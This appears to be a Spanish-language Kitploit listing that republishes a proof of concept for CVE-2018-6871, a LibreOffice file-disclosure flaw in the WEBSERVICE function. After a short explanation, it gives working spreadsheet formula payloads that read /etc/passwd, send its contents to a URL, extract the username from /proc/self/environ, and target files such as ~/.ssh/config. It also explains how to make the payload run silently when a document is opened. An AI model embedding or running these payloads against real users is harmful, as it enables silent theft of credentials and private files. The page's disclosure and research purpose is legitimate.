Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
libreoffice-remote-arbitrary-file-disclosure — Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability | Kitploit
Herramientas/GitHubGitHub/jollheef/libreoffice-remote-arbitrary-file-disclosure
Vulnerability AnalysisExploitationData ExfiltrationInformation Gathering
GitHubjollheef/libreoffice-remote-arbitrary-file-disclosure

libreoffice-remote-arbitrary-file-disclosure

Proof of concept of LibreOffice remote arbitrary file disclosure vulnerability

Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
969hace 8 añosRevisado por Kitploit

Descripción de la vulnerabilidad

CVE-2018-6871

Primera parte

LibreOffice es compatible con la función COM.MICROSOFT.WEBSERVICE:

root@kitploit:~
https://support.office.com/en-us/article/webservice-function-0546a35a-ecc6-4739-aed7-c0b7ce1562c4

La función es necesaria para obtener datos por URL, normalmente se usa como:

root@kitploit:~
=FILTERXML(WEBSERVICE("http://api.openweathermap.org/data/2.5/forecast?q=Copenhagen,dk&mode=xml&units=metric");"number(/weatherdata/forecast/time[2]/temperature/@value)")

En el original:

root@kitploit:~
For protocols that are not supported, such as ftp: // or file: //, WEBSERVICE returns the #VALUE! error value.

En LibreOffice, estas restricciones no están implementadas antes de las versiones 5.4.5/6.0.1.

Segunda parte

Por defecto, las celdas no se actualizan, pero si especificas el tipo de celda como ~error, la celda se actualizará al abrir el documento.

Explotación

Para leer un archivo solo necesitas:

root@kitploit:~
=WEBSERVICE("/etc/passwd")

Esta función también se puede usar para enviar un archivo:

root@kitploit:~
=WEBSERVICE("http://localhost:6000/?q=" & WEBSERVICE("/etc/passwd"))

Para que la operación tenga éxito, necesitas enviar los archivos del usuario actual, por lo que debes obtener la ruta del directorio personal del usuario actual.

root@kitploit:~
=MID(WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")) + 5, SEARCH(CHAR(0), WEBSERVICE("/proc/self/environ"), FIND("USER=", WEBSERVICE("/proc/self/environ")))-FIND("USER=",

También puedes analizar otros archivos, como ~/.ssh/config o algo similar.

Para formatos distintos de los de LibreOffice Calc, solo necesitas incrustar un objeto de Calc en otro documento (he comprobado que funciona).

Impacto

Es fácil enviar cualquier archivo con claves, contraseñas y cualquier otra cosa. 100% de tasa de éxito, absolutamente silencioso, afecta a LibreOffice anterior a 5.4.5/6.0.1 en todos los sistemas operativos (GNU/Linux, MS Windows, macOS, etc.) y puede incrustarse en casi todos los formatos compatibles con LO.

Agradecimientos

La vulnerabilidad fue encontrada de forma independiente por mí (@jollheef) y Ronnie Goodrich y Andrew Krasichkov (según las notas del equipo de LibreOffice).

Descargar herramienta